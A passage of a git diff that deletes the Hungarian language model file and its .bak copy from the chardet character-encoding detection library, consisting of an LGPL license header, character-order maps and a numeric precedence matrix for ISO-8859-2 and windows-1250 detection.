59,236,237,238, 60, 70, 63,239,240,241, - 84, 14, 75,242, 71, 82,243, 73,244, 15, 85, 79, 86, 30, 77, 87, -245,246,247, 25, 74, 42, 24,248,249,250, 31, 56, 29,251,252,253, -) - -# Model Table: -# total sequences: 100% -# first 512 sequences: 94.7368% -# first 1024 sequences:5.2623% -# rest sequences: 0.8894% -# negative sequences: 0.0009% -HungarianLangModel = ( \ -0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3, -3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,2,3,3,1,1,2,2,2,2,2,1,2, -3,2,2,3,3,3,3,3,2,3,3,3,3,3,3,1,2,3,3,3,3,2,3,3,1,1,3,3,0,1,1,1, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0, -3,2,1,3,3,3,3,3,2,3,3,3,3,3,1,1,2,3,3,3,3,3,3,3,1,1,3,2,0,1,1,1, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,1,1,2,3,3,3,1,3,3,3,3,3,1,3,3,2,2,0,3,2,3, -0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0, -3,3,3,3,3,3,2,3,3,3,2,3,3,2,3,3,3,3,3,2,3,3,2,2,3,2,3,2,0,3,2,2, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0, -3,3,3,3,3,3,2,3,3,3,3,3,2,3,3,3,1,2,3,2,2,3,1,2,3,3,2,2,0,3,3,3, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,2,2,3,3,3,3,3,3,2,3,3,3,3,2,3,3,3,3,0,2,3,2, -0,0,0,1,1,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,3,1,1,1,3,3,2,1,3,2,2,3,2,1,3,2,2,1,0,3,3,1, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,2,2,3,3,3,3,3,1,2,3,3,3,3,1,2,1,3,3,3,3,2,2,3,1,1,3,2,0,1,1,1, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,2,2,3,3,3,3,3,2,1,3,3,3,3,3,2,2,1,3,3,3,0,1,1,2, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,2,3,3,2,3,3,3,2,0,3,2,3, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,1,0, -3,3,3,3,3,3,2,3,3,3,2,3,2,3,3,3,1,3,2,2,2,3,1,1,3,3,1,1,0,3,3,2, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,2,3,3,3,2,3,2,3,3,3,2,3,3,3,3,3,1,2,3,2,2,0,2,2,2, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,3,3,2,2,2,3,1,3,3,2,2,1,3,3,3,1,1,3,1,2,3,2,3,2,2,2,1,0,2,2,2, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0, -3,1,1,3,3,3,3,3,1,2,3,3,3,3,1,2,1,3,3,3,2,2,3,2,1,0,3,2,0,1,1,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,1,1,3,3,3,3,3,1,2,3,3,3,3,1,1,0,3,3,3,3,0,2,3,0,0,2,1,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,2,2,3,3,2,2,2,2,3,3,0,1,2,3,2,3,2,2,3,2,1,2,0,2,2,2, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0, -3,3,3,3,3,3,1,2,3,3,3,2,1,2,3,3,2,2,2,3,2,3,3,1,3,3,1,1,0,2,3,2, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,3,3,1,2,2,2,2,3,3,3,1,1,1,3,3,1,1,3,1,1,3,2,1,2,3,1,1,0,2,2,2, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,3,3,2,1,2,1,1,3,3,1,1,1,1,3,3,1,1,2,2,1,2,1,1,2,2,1,1,0,2,2,1, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,3,3,1,1,2,1,1,3,3,1,0,1,1,3,3,2,0,1,1,2,3,1,0,2,2,1,0,0,1,3,2, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,2,1,3,3,3,3,3,1,2,3,2,3,3,2,1,1,3,2,3,2,1,2,2,0,1,2,1,0,0,1,1, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,3,3,3,2,2,2,2,3,1,2,2,1,1,3,3,0,3,2,1,2,3,2,1,3,3,1,1,0,2,1,3, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,3,3,2,2,2,3,2,3,3,3,2,1,1,3,3,1,1,1,2,2,3,2,3,2,2,2,1,0,2,2,1, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -1,0,0,3,3,3,3,3,0,0,3,3,2,3,0,0,0,2,3,3,1,0,1,2,0,0,1,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,1,2,3,3,3,3,3,1,2,3,3,2,2,1,1,0,3,3,2,2,1,2,2,1,0,2,2,0,1,1,1, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,2,2,1,3,1,2,3,3,2,2,1,1,2,2,1,1,1,1,3,2,1,1,1,1,2,1,0,1,2,1, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0, -2,3,3,1,1,1,1,1,3,3,3,0,1,1,3,3,1,1,1,1,1,2,2,0,3,1,1,2,0,2,1,1, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,1,0,1,2,1,2,2,0,1,2,3,1,2,0,0,0,2,1,1,1,1,1,2,0,0,1,1,0,0,0,0, -1,2,1,2,2,2,1,2,1,2,0,2,0,2,2,1,1,2,1,1,2,1,1,1,0,1,0,0,0,1,1,0, -1,1,1,2,3,2,3,3,0,1,2,2,3,1,0,1,0,2,1,2,2,0,1,1,0,0,1,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,3,3,2,2,1,0,0,3,2,3,2,0,0,0,1,1,3,0,0,1,1,0,0,2,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,1,1,2,2,3,3,1,0,1,3,2,3,1,1,1,0,1,1,1,1,1,3,1,0,0,2,2,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,1,1,1,2,2,2,1,0,1,2,3,3,2,0,0,0,2,1,1,1,2,1,1,1,0,1,1,1,0,0,0, -1,2,2,2,2,2,1,1,1,2,0,2,1,1,1,1,1,2,1,1,1,1,1,1,0,1,1,1,0,0,1,1, -3,2,2,1,0,0,1,1,2,2,0,3,0,1,2,1,1,0,0,1,1,1,0,1,1,1,1,0,2,1,1,1, -2,2,1,1,1,2,1,2,1,1,1,1,1,1,1,2,1,1,1,2,3,1,1,1,1,1,1,1,1,1,0,1, -2,3,3,0,1,0,0,0,3,3,1,0,0,1,2,2,1,0,0,0,0,2,0,0,1,1,1,0,2,1,1,1, -2,1,1,1,1,1,1,2,1,1,0,1,1,0,1,1,1,0,1,2,1,1,0,1,1,1,1,1,1,1,0,1, -2,3,3,0,1,0,0,0,2,2,0,0,0,0,1,2,2,0,0,0,0,1,0,0,1,1,0,0,2,0,1,0, -2,1,1,1,1,2,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,2,0,1,1,1,1,1,0,1, -3,2,2,0,1,0,1,0,2,3,2,0,0,1,2,2,1,0,0,1,1,1,0,0,2,1,0,1,2,2,1,1, -2,1,1,1,1,1,1,2,1,1,1,1,1,1,0,2,1,0,1,1,0,1,1,1,0,1,1,2,1,1,0,1, -2,2,2,0,0,1,0,0,2,2,1,1,0,0,2,1,1,0,0,0,1,2,0,0,2,1,0,0,2,1,1,1, -2,1,1,1,1,2,1,2,1,1,1,2,2,1,1,2,1,1,1,2,1,1,1,1,1,1,1,1,1,1,0,1, -1,2,3,0,0,0,1,0,3,2,1,0,0,1,2,1,1,0,0,0,0,2,1,0,1,1,0,0,2,1,2,1, -1,1,0,0,0,1,0,1,1,1,1,1,2,0,0,1,0,0,0,2,0,0,1,1,1,1,1,1,1,1,0,1, -3,0,0,2,1,2,2,1,0,0,2,1,2,2,0,0,0,2,1,1,1,0,1,1,0,0,1,1,2,0,0,0, -1,2,1,2,2,1,1,2,1,2,0,1,1,1,1,1,1,1,1,1,2,1,1,0,0,1,1,1,1,0,0,1, -1,3,2,0,0,0,1,0,2,2,2,0,0,0,2,2,1,0,0,0,0,3,1,1,1,1,0,0,2,1,1,1, -2,1,0,1,1,1,0,1,1,1,1,1,1,1,0,2,1,0,0,1,0,1,1,0,1,1,1,1,1,1,0,1, -2,3,2,0,0,0,1,0,2,2,0,0,0,0,2,1,1,0,0,0,0,2,1,0,1,1,0,0,2,1,1,0, -2,1,1,1,1,2,1,2,1,2,0,1,1,1,0,2,1,1,1,2,1,1,1,1,0,1,1,1,1,1,0,1, -3,1,1,2,2,2,3,2,1,1,2,2,1,1,0,1,0,2,2,1,1,1,1,1,0,0,1,1,0,1,1,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,2,2,0,0,0,0,0,2,2,0,0,0,0,2,2,1,0,0,0,1,1,0,0,1,2,0,0,2,1,1,1, -2,2,1,1,1,2,1,2,1,1,0,1,1,1,1,2,1,1,1,2,1,1,1,1,0,1,2,1,1,1,0,1, -1,0,0,1,2,3,2,1,0,0,2,0,1,1,0,0,0,1,1,1,1,0,1,1,0,0,1,0,0,0,0,0, -1,2,1,2,1,2,1,1,1,2,0,2,1,1,1,0,1,2,0,0,1,1,1,0,0,0,0,0,0,0,0,0, -2,3,2,0,0,0,0,0,1,1,2,1,0,0,1,1,1,0,0,0,0,2,0,0,1,1,0,0,2,1,1,1, -2,1,1,1,1,1,1,2,1,0,1,1,1,1,0,2,1,1,1,1,1,1,0,1,0,1,1,1,1,1,0,1, -1,2,2,0,1,1,1,0,2,2,2,0,0,0,3,2,1,0,0,0,1,1,0,0,1,1,0,1,1,1,0,0, -1,1,0,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,2,1,1,1,0,0,1,1,1,0,1,0,1, -2,1,0,2,1,1,2,2,1,1,2,1,1,1,0,0,0,1,1,0,1,1,1,1,0,0,1,1,1,0,0,0, -1,2,2,2,2,2,1,1,1,2,0,2,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,0,0,1,0, -1,2,3,0,0,0,1,0,2,2,0,0,0,0,2,2,0,0,0,0,0,1,0,0,1,0,0,0,2,0,1,0, -2,1,1,1,1,1,0,2,0,0,0,1,2,1,1,1,1,0,1,2,0,1,0,1,0,1,1,1,0,1,0,1, -2,2,2,0,0,0,1,0,2,1,2,0,0,0,1,1,2,0,0,0,0,1,0,0,1,1,0,0,2,1,0,1, -2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,0,1,1,1,1,1,0,1, -1,2,2,0,0,0,1,0,2,2,2,0,0,0,1,1,0,0,0,0,0,1,1,0,2,0,0,1,1,1,0,1, -1,0,1,1,1,1,1,1,0,1,1,1,1,0,0,1,0,0,1,1,0,1,0,1,1,1,1,1,0,0,0,1, -1,0,0,1,0,1,2,1,0,0,1,1,1,2,0,0,0,1,1,0,1,0,1,1,0,0,1,0,0,0,0,0, -0,2,1,2,1,1,1,1,1,2,0,2,0,1,1,0,1,2,1,0,1,1,1,0,0,0,0,0,0,1,0,0, -2,1,1,0,1,2,0,0,1,1,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,0,0,0,2,1,0,1, -2,2,1,1,1,1,1,2,1,1,0,1,1,1,1,2,1,1,1,2,1,1,0,1,0,1,1,1,1,1,0,1, -1,2,2,0,0,0,0,0,1,1,0,0,0,0,2,1,0,0,0,0,0,2,0,0,2,2,0,0,2,0,0,1, -2,1,1,1,1,1,1,1,0,1,1,0,1,1,0,1,0,0,0,1,1,1,1,0,0,1,1,1,1,0,0,1, -1,1,2,0,0,3,1,0,2,1,1,1,0,0,1,1,1,0,0,0,1,1,0,0,0,1,0,0,1,0,1,0, -1,2,1,0,1,1,1,2,1,1,0,1,1,1,1,1,0,0,0,1,1,1,1,1,0,1,0,0,0,1,0,0, -2,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,2,0,0,0, -2,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,2,1,1,0,0,1,1,1,1,1,0,1, -2,1,1,1,2,1,1,1,0,1,1,2,1,0,0,0,0,1,1,1,1,0,1,0,0,0,0,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,1,0,1,1,1,1,1,0,0,1,1,2,1,0,0,0,1,1,0,0,0,1,1,0,0,1,0,1,0,0,0, -1,2,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,0,0, -2,0,0,0,1,1,1,1,0,0,1,1,0,0,0,0,0,1,1,1,2,0,0,1,0,0,1,0,1,0,0,0, -0,1,1,1,1,1,1,1,1,2,0,1,1,1,1,0,1,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0, -1,0,0,1,1,1,1,1,0,0,2,1,0,1,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0, -0,1,1,1,1,1,1,0,1,1,0,1,0,1,1,0,1,1,0,0,1,1,1,0,0,0,0,0,0,0,0,0, -1,0,0,1,1,1,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, -0,1,1,1,1,1,0,0,1,1,0,1,0,1,0,0,1,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0, -0,0,0,1,0,0,0,0,0,0,1,1,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,1,1,1,0,1,0,0,1,1,0,1,0,1,1,0,1,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0, -2,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,0,1,0,0,1,0,1,0,1,1,1,0,0,1,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,1,1,1,1,0,0,0,1,1,1,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0, -0,1,1,1,1,1,1,0,1,1,0,1,0,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0, -) - -Latin2HungarianModel = { \ - 'charToOrderMap': Latin2_HungarianCharToOrderMap, - 'precedenceMatrix': HungarianLangModel, - 'mTypicalPositiveRatio': 0.947368, - 'keepEnglishLetter': True, - 'charsetName': "ISO-8859-2" -} - -Win1250HungarianModel = { \ - 'charToOrderMap': win1250HungarianCharToOrderMap, - 'precedenceMatrix': HungarianLangModel, - 'mTypicalPositiveRatio': 0.947368, - 'keepEnglishLetter': True, - 'charsetName': "windows-1250" -} diff --git a/chardet/chardet/langhungarianmodel.py.bak b/chardet/chardet/langhungarianmodel.py.bak deleted file mode 100644 index d635f03..0000000 --- a/chardet/chardet/langhungarianmodel.py.bak +++ /dev/null @@ -1,225 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import constants - -# 255: Control characters that usually does not exist in any text -# 254: Carriage/Return -# 253: symbol (punctuation) that does not belong to word -# 252: 0 - 9 - -# Character Mapping Table: -Latin2_HungarianCharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253, 28, 40, 54, 45, 32, 50, 49, 38, 39, 53, 36, 41, 34, 35, 47, - 46, 71, 43, 33, 37, 57, 48, 64, 68, 55, 52,253,253,253,253,253, -253, 2, 18, 26, 17, 1, 27, 12, 20, 9, 22, 7, 6, 13, 4, 8, - 23, 67, 10, 5, 3, 21, 19, 65, 62, 16, 11,253,253,253,253,253, -159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174, -175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190, -191,192,193,194,195,196,197, 75,198,199,200,201,202,203,204,205, - 79,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220, -221, 51, 81,222, 78,223,224,225,226, 44,227,228,229, 61,230,231, -232,233,234, 58,235, 66, 59,236,237,238, 60, 69, 63,239,240,241, - 82, 14, 74,242, 70, 80,243, 72,244, 15, 83, 77, 84, 30, 76, 85, -245,246,247, 25, 73, 42, 24,248,249,250, 31, 56, 29,251,252,253, -) - -win1250HungarianCharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253, 28, 40, 54, 45, 32, 50, 49, 38, 39, 53, 36, 41, 34, 35, 47, - 46, 72, 43, 33, 37, 57, 48, 64, 68, 55, 52,253,253,253,253,253, -253, 2, 18, 26, 17, 1, 27, 12, 20, 9, 22, 7, 6, 13, 4, 8, - 23, 67, 10, 5, 3, 21, 19, 65, 62, 16, 11,253,253,253,253,253, -161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176, -177,178,179,180, 78,181, 69,182,183,184,185,186,187,188,189,190, -191,192,193,194,195,196,197, 76,198,199,200,201,202,203,204,205, - 81,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220, -221, 51, 83,222, 80,223,224,225,226, 44,227,228,229, 61,230,231, -232,233,234, 58,235, 66, 59,236,237,238, 60, 70, 63,239,240,241, - 84, 14, 75,242, 71, 82,243, 73,244, 15, 85, 79, 86, 30, 77, 87, -245,246,247, 25, 74, 42, 24,248,249,250, 31, 56, 29,251,252,253, -) - -# Model Table: -# total sequences: 100% -# first 512 sequences: 94.7368% -# first 1024 sequences:5.2623% -# rest sequences: 0.8894% -# negative sequences: 0.0009% -HungarianLangModel = ( \ -0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3, -3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,2,3,3,1,1,2,2,2,2,2,1,2, -3,2,2,3,3,3,3,3,2,3,3,3,3,3,3,1,2,3,3,3,3,2,3,3,1,1,3,3,0,1,1,1, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0, -3,2,1,3,3,3,3,3,2,3,3,3,3,3,1,1,2,3,3,3,3,3,3,3,1,1,3,2,0,1,1,1, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,1,1,2,3,3,3,1,3,3,3,3,3,1,3,3,2,2,0,3,2,3, -0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0, -3,3,3,3,3,3,2,3,3,3,2,3,3,2,3,3,3,3,3,2,3,3,2,2,3,2,3,2,0,3,2,2, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0, -3,3,3,3,3,3,2,3,3,3,3,3,2,3,3,3,1,2,3,2,2,3,1,2,3,3,2,2,0,3,3,3, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,2,2,3,3,3,3,3,3,2,3,3,3,3,2,3,3,3,3,0,2,3,2, -0,0,0,1,1,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,3,1,1,1,3,3,2,1,3,2,2,3,2,1,3,2,2,1,0,3,3,1, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,2,2,3,3,3,3,3,1,2,3,3,3,3,1,2,1,3,3,3,3,2,2,3,1,1,3,2,0,1,1,1, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,2,2,3,3,3,3,3,2,1,3,3,3,3,3,2,2,1,3,3,3,0,1,1,2, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,2,3,3,2,3,3,3,2,0,3,2,3, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,1,0, -3,3,3,3,3,3,2,3,3,3,2,3,2,3,3,3,1,3,2,2,2,3,1,1,3,3,1,1,0,3,3,2, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,2,3,3,3,2,3,2,3,3,3,2,3,3,3,3,3,1,2,3,2,2,0,2,2,2, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,3,3,2,2,2,3,1,3,3,2,2,1,3,3,3,1,1,3,1,2,3,2,3,2,2,2,1,0,2,2,2, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0, -3,1,1,3,3,3,3,3,1,2,3,3,3,3,1,2,1,3,3,3,2,2,3,2,1,0,3,2,0,1,1,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,1,1,3,3,3,3,3,1,2,3,3,3,3,1,1,0,3,3,3,3,0,2,3,0,0,2,1,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,2,2,3,3,2,2,2,2,3,3,0,1,2,3,2,3,2,2,3,2,1,2,0,2,2,2, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0, -3,3,3,3,3,3,1,2,3,3,3,2,1,2,3,3,2,2,2,3,2,3,3,1,3,3,1,1,0,2,3,2, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,3,3,1,2,2,2,2,3,3,3,1,1,1,3,3,1,1,3,1,1,3,2,1,2,3,1,1,0,2,2,2, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,3,3,2,1,2,1,1,3,3,1,1,1,1,3,3,1,1,2,2,1,2,1,1,2,2,1,1,0,2,2,1, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,3,3,1,1,2,1,1,3,3,1,0,1,1,3,3,2,0,1,1,2,3,1,0,2,2,1,0,0,1,3,2, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,2,1,3,3,3,3,3,1,2,3,2,3,3,2,1,1,3,2,3,2,1,2,2,0,1,2,1,0,0,1,1, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0, -3,3,3,3,2,2,2,2,3,1,2,2,1,1,3,3,0,3,2,1,2,3,2,1,3,3,1,1,0,2,1,3, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,3,3,2,2,2,3,2,3,3,3,2,1,1,3,3,1,1,1,2,2,3,2,3,2,2,2,1,0,2,2,1, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -1,0,0,3,3,3,3,3,0,0,3,3,2,3,0,0,0,2,3,3,1,0,1,2,0,0,1,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,1,2,3,3,3,3,3,1,2,3,3,2,2,1,1,0,3,3,2,2,1,2,2,1,0,2,2,0,1,1,1, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,2,2,1,3,1,2,3,3,2,2,1,1,2,2,1,1,1,1,3,2,1,1,1,1,2,1,0,1,2,1, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0, -2,3,3,1,1,1,1,1,3,3,3,0,1,1,3,3,1,1,1,1,1,2,2,0,3,1,1,2,0,2,1,1, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0, -3,1,0,1,2,1,2,2,0,1,2,3,1,2,0,0,0,2,1,1,1,1,1,2,0,0,1,1,0,0,0,0, -1,2,1,2,2,2,1,2,1,2,0,2,0,2,2,1,1,2,1,1,2,1,1,1,0,1,0,0,0,1,1,0, -1,1,1,2,3,2,3,3,0,1,2,2,3,1,0,1,0,2,1,2,2,0,1,1,0,0,1,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,3,3,2,2,1,0,0,3,2,3,2,0,0,0,1,1,3,0,0,1,1,0,0,2,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,1,1,2,2,3,3,1,0,1,3,2,3,1,1,1,0,1,1,1,1,1,3,1,0,0,2,2,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 